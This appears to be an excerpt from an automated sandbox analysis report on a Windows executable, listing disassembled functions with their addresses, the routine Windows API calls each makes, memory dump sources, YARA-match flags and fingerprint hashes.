Opcode ID: 0acb73a93deb74c8d9afcb05a31c8dc75083df2002a9600c579cc403e8080187
Instruction ID: d05f8d45288b7ceafe0d608ee8c6d0c805fd160f4efafd973879376d9263c89b
Opcode Fuzzy Hash: 0acb73a93deb74c8d9afcb05a31c8dc75083df2002a9600c579cc403e8080187
Instruction Fuzzy Hash: 02E18E70600209AFDB14EF55CC81ABF77A9EF4C315F10951BF816AB2A1DB38E901DB69

Function 004366D0 Relevance: 3.1, APIs: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004356B4: __EH_prolog.LIBCMT ref: 004356B9
Part of subcall function 004356B4: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 004356D7
Part of subcall function 004356B4: lstrcpynA.KERNEL32(?,?,00000104), ref: 004356E6

FindFirstFileA.KERNEL32(?,?,?,?), ref: 004366FC
FindClose.KERNEL32(00000000), ref: 0043670E

Part of subcall function 0042C4F6: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042C506
Part of subcall function 0042C4F6: FileTimeToSystemTime.KERNEL32(?,?), ref: 0042C518

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
String ID:
API String ID: 1806329094-0
Opcode ID: 701726aa720935535ff8ee8c5e921ffae1a8a9edb0806d46f0f7242bbdd37c54
Instruction ID: 7fdd0f569eedefcfe9e51e641643d66f3452c3c96738a71147f5731c5d86306b
Opcode Fuzzy Hash: 701726aa720935535ff8ee8c5e921ffae1a8a9edb0806d46f0f7242bbdd37c54
Instruction Fuzzy Hash: 47216F32500215AFCB21EF65C840AEBBBF8AF59314F00856EE59AD7251E774AA84CF54

Function 004446A5 Relevance: 3.0, APIs: 2, Instructions: 40keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

GetKeyState.USER32(00000073), ref: 004446D3
GetKeyState.USER32(00000012), ref: 004446DC

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: State$LongWindow
String ID:
API String ID: 3716621309-0
Opcode ID: 446ff2afe5a1ca65ba835e96e001f8766a53f71ba5706f4f7fcbe9c24a90491f
Instruction ID: 3a6634aa51da22139750661f361aface9ec07371222f0b739d7ce7e6e915cc4a
Opcode Fuzzy Hash: 446ff2afe5a1ca65ba835e96e001f8766a53f71ba5706f4f7fcbe9c24a90491f
Instruction Fuzzy Hash: 5DF02B3624020A36FF202E5ACC00BBE3A54DF927E8F014037FD4856351CA7DCD5296B8

Function 00447B19 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00447B29
IsIconic.USER32(?), ref: 00447B3A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 82672a3123a8582233129ab90d42ea3c0c886802f2cc5b4e1f227d82b593b9e7
Instruction ID: ae9b9807d41e62daa26a21c4da40a72dbc52d4e3893bea9503af18d7983b524c
Opcode Fuzzy Hash: 82672a3123a8582233129ab90d42ea3c0c886802f2cc5b4e1f227d82b593b9e7
Instruction Fuzzy Hash: 0EF05C3170825136E9112A18AC91EBF611EDF8133DF10022FF660A32E0DB58AC83829D

Function 0043F1C0 Relevance: 3.0, APIs: 2, Instructions: 15windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0043F1C6
IsWindowVisible.USER32(?), ref: 0043F1D3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: de1a3115defaaf9cefd425b8acdf921218ce4adc427bc93f39c81d6b5acc95a6
Instruction ID: e6c687807bee17e165dbe35c5dd5d67feb0e940976349b359ee10a629c90e61f
Opcode Fuzzy Hash: de1a3115defaaf9cefd425b8acdf921218ce4adc427bc93f39c81d6b5acc95a6
Instruction Fuzzy Hash: 28D05E31200710DFEB201F14FC08AB67AA5AF18202B208479E042C3261EB20EC05CA44

Function 00697530 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

_I, xrefs: 00697623
j>, xrefs: 00697536

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: j>$_I
API String ID: 0-1249037685
Opcode ID: 86afd0acd69c54a6900f1a1e1a1dc8a6748941366fa664cafbfcf364c1a83b16
Instruction ID: 6a324f343f61ee996e1b02ab8cfc8ed4d6e6dceb0134200bd3a0d5106d6cdc3d
Opcode Fuzzy Hash: 86afd0acd69c54a6900f1a1e1a1dc8a6748941366fa664cafbfcf364c1a83b16
Instruction Fuzzy Hash: A3A1BF71A083028BCB58DF68D94552BB7EABBC4744F00492EF5859B790E774DE09CB92

Function 005490CE Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

_I, xrefs: 005491C1
j>, xrefs: 005490D4

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: j>$_I
API String ID: 0-1249037685
Opcode ID: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
Instruction ID: a34855d6acccfa24a8b2b8b77e4e19c94d06b31f79e85e4933197efcc3aa249f
Opcode Fuzzy Hash: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
Instruction Fuzzy Hash: A1A1E471A083028FC758DF68D54A56FBBE5BBC4308F00492DF486AB2A5E770DD09CB92

Function 0040D350 Relevance: 1.5, APIs: 1, Instructions: 40comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0045C720,00000000,00000001,0045C730,?,00000000,?,0000000C,0040D3B8,?,00403E27,?,?,Keeps an eye on the dial-up connections,?,0046B4B8), ref: 0040D37D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 5e9b9a49c0473a666289e0a928098332564e71975bdb61eb0374f5783f58ea84
Instruction ID: 0dbdf5552b948aef465003624f384c5817288fe27d19abfeacc2b67c9be3279d
Opcode Fuzzy Hash: 5e9b9a49c0473a666289e0a928098332564e71975bdb61eb0374f5783f58ea84
Instruction Fuzzy Hash: FCF06D323007029FD7208AA98CC0B97B7E9EF88B51B50493EB902DB590C7A4F804CA58

Function 00420316 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000202D0), ref: 0042031B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 38539913b2c5a84a10cc8286e83eb21820615253c9b5361bd7b6039d9a174279
Instruction ID: 4ede8b8ca579d777986e3424145625e1d44bfe3913fe0af68b2ac7971d0eb246
Opcode Fuzzy Hash: 38539913b2c5a84a10cc8286e83eb21820615253c9b5361bd7b6039d9a174279
Instruction Fuzzy Hash: 25A001B8A416519A96006B60B99D6193AE0A649703F6414A6E401A52A6EAA448409E6A

Function 00420328 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0042032D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 78834a77532144ee1319afd85191ce965affce9c377ea2d2902cc880baf4281e
Instruction ID: 9f5885843abf5f1b56215d2159c7f39d658d842938988baf6ba093b411ef8178
Opcode Fuzzy Hash: 78834a77532144ee1319afd85191ce965affce9c377ea2d2902cc880baf4281e
Instruction Fuzzy Hash:

Function 00691C70 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

Z#, xrefs: 00691C73

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: Z#
API String ID: 0-2750076499
Opcode ID: d123732a6992fefae0cba9faa9635d49e5e320d4df6323692f90921e5f2a1240
Instruction ID: 45cc7a7d650a5caf6bd6ef4879807aa3ebbcf967d78156815f56ccc2f493e541
Opcode Fuzzy Hash: d123732a6992fefae0cba9faa9635d49e5e320d4df6323692f90921e5f2a1240
Instruction Fuzzy Hash: BE4179B16083019FC748EF24D85506AB7EABFD4714F408C2EE4DA8B760D7B899198F82

Function 0054380E Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

Z#, xrefs: 00543811

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: Z#
API String ID: 0-2750076499
Opcode ID: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
Instruction ID: 22071a2a917d4d134f5d0eee485603c665da18f4ceadd858f3293e800127cc55
Opcode Fuzzy Hash: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
Instruction Fuzzy Hash: EA418E71A087029FC308EF64C94506EB7E1BFD5718F408C2DE4D987264D7B8991ACF42

Function 00693E40 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

G, xrefs: 00693E80

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: G
API String ID: 0-2152773504
Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
Instruction ID: 10c0d5ce378b49bdc2ea871c435a875d186f6bf956afa47a8309e5f0ad280bab
Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
Instruction Fuzzy Hash: 284101B19093968BD714DF18E18846BB7F5FB80B14F004D5EF4A09A650E3B4DA4CCBA3

Function 005459DE Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

G, xrefs: 00545A1E

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID: G
API String ID: 0-2152773504
Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
Instruction ID: 9079339153972f90ab0522ff8b34defd1c9bf48b73c9f895464141124aefd83b
Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
Instruction Fuzzy Hash: DC41E2B15093968BD314DF15E18446BBBE0FB80B59F404E5EF4A19A251E3B4DA4CCBA3

Function 0054095E Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
Instruction ID: d5e2faccbf317e0f464fa2c7065eaeee552867259eedaab3952558d386172680
Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
Instruction Fuzzy Hash: A8F10C74E00209EFDB04DF94C994AEEBBB1BF88304F208558EA06AB385D774EE41DB50

Function 0041EF14 Relevance: .3, Instructions: 259COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: b5bd24a020fab35d398279f49aa9090130999358ba4af01fc8fd1a9e3a52e6fb
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: B6B17E75A0020ADFDB15CF04C5D0AE9BBA1BB58318F24C1AED81A5B342D735EE86CB94

Function 00540456 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: a653ce663e5de0231e1a56b4e1a306b24c8b96ee8810027b6aff4586f93db3e3
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: 1631D536A043468FCB10DF18C4809A6BBE4FF88318F16196DEB9587356D334F9068B91

Function 00694D00 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 0054689E Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_ExeFile (360).jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 0042A190 Relevance: 55.9, APIs: 37, Instructions: 426windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0042A1A4
GetParent.USER32(?), ref: 0042A1BD
SetBkMode.GDI32(?,00000002), ref: 0042A1CD
GetClientRect.USER32(?,?), ref: 0042A1DF
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0042A207
SelectObject.GDI32(?,00000000), ref: 0042A217

Part of subcall function 00429E50: InflateRect.USER32(?,000000FF,000000FF), ref: 00429E92
Part of subcall function 00429E50: IsWindowEnabled.USER32(?), ref: 00429EA5
Part of subcall function 00429E50: InflateRect.USER32(?,000000FF,000000FF), ref: 00429ECC
Part of subcall function 00429E50: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429EE3
Part of subcall function 00429E50: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429EFC
Part of subcall function 00429E50: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429F14
Part of subcall function 00429E50: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429F2E
Part of subcall function 00429E50: SelectObject.GDI32(?,00000000), ref: 00429F53

GetSysColor.USER32(0000000F), ref: 0042A229
SetBkColor.GDI32(?,00000000), ref: 0042A22D
GetSysColor.USER32(00000012), ref: 0042A235
SetTextColor.GDI32(?,00000000), ref: 0042A239
SendMessageA.USER32(?,00000135,?,?), ref: 0042A24B
SelectObject.GDI32(?,00000000), ref: 0042A253
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0042A278
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0042A2B0
IsWindowEnabled.USER32(?), ref: 0042A2B7
SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0042A2CB
GetWindowTextA.USER32(?,?,00000100), ref: 0042A339
SelectObject.GDI32(?,?), ref: 0042A68F
SelectObject.GDI32(?,00000000), ref: 0042A6A2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
String ID:
API String ID: 2549663215-0
Opcode ID: f48faae77b81b4df42abd1730e7e538fa122aa467ee8b1254730d433af650fa2
Instruction ID: 6f4de9bfd1d3b6f5b77042417444316e43b6a34d273a018d87e75f07406569b4
Opcode Fuzzy Hash: f48faae77b81b4df42abd1730e7e538fa122aa467ee8b1254730d433af650fa2
Instruction Fuzzy Hash: 08F169B1204301AFD310DF68DC88B6FBBE8FB88705F44492DF98186251E7B9E945CB5A

Function 0042A9C0 Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 263windowstringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0042A9CE
SendMessageA.USER32(?,00000157,00000000,00000000), ref: 0042A9FA
HideCaret.USER32(?), ref: 0042AA10
GetWindowRect.USER32(?,?), ref: 0042AA1C
GetParent.USER32(?), ref: 0042AA23
ScreenToClient.USER32(00000000,?), ref: 0042AA37
ScreenToClient.USER32(00000000,?), ref: 0042AA43
GetDC.USER32(00000000), ref: 0042AA46
GetWindowLongA.USER32(?,000000F4), ref: 0042AA78
SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 0042AAA5
SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 0042AAC6
GetClassNameA.USER32(00000000,?,00000010), ref: 0042AAD8
lstrcmpA.KERNEL32(?,ComboBox), ref: 0042AAE8
GetParent.USER32(00000000), ref: 0042AB0C
MapWindowPoints.USER32(00000000,0000029A,?,00000002), ref: 0042AB23
ReleaseDC.USER32(00000000,00000000), ref: 0042AB2B
GetDC.USER32(?), ref: 0042AB36
GetWindowLongA.USER32(00000000,000000F0), ref: 0042AB4C
GetWindow.USER32(00000000,00000005), ref: 0042AB67
GetWindowRect.USER32(00000000,?), ref: 0042AB73
SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 0042ABB0
ReleaseDC.USER32(?,00000000), ref: 0042ABC0
ShowCaret.USER32(?), ref: 0042ABC7
GetSystemMetrics.USER32(00000002), ref: 0042AC08
GetSystemMetrics.USER32(00000002), ref: 0042AC67
GetSystemMetrics.USER32(00000015), ref: 0042ACB8
ReleaseDC.USER32(00000000,00000000), ref: 0042ACDA
ShowCaret.USER32(?), ref: 0042ACE8

Strings

ComboBox, xrefs: 0042AAE2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
String ID: ComboBox
API String ID: 930961256-1152790111
Opcode ID: 59af1590507c608fd4d398a9e9d341353c6e869cc250a1c173810154e8fa8399
Instruction ID: 56166c3ea1cd7c67bbcaf395d1186e03c79994d08852eb93d8179149e7e83240
Opcode Fuzzy Hash: 59af1590507c608fd4d398a9e9d341353c6e869cc250a1c173810154e8fa8399
Instruction Fuzzy Hash: 4091DF71608305AFD310DB24DC59F7FB7A8EB8470AF80092EFA4596292D778E905CB5B

Function 00406980 Relevance: 49.4, APIs: 27, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000005), ref: 004069B6
GetSysColor.USER32(00000004), ref: 004069C3

Part of subcall function 00406020: MulDiv.KERNEL32(00000056,?,00000064), ref: 00406039
Part of subcall function 00406020: MulDiv.KERNEL32(0000000E,?,00000064), ref: 0040604C
Part of subcall function 00406020: MulDiv.KERNEL32(00000056,?,00000064), ref: 0040605F
Part of subcall function 00406020: MulDiv.KERNEL32(0000000E,?,00000064), ref: 00406075
Part of subcall function 00406020: MulDiv.KERNEL32(00000056,?,00000064), ref: 0040608F
Part of subcall function 00406020: MulDiv.KERNEL32(0000000E,?,00000064), ref: 004060A4

CopyRect.USER32(?,?), ref: 004069EC
GetSystemMetrics.USER32(00000047), ref: 00406A1D
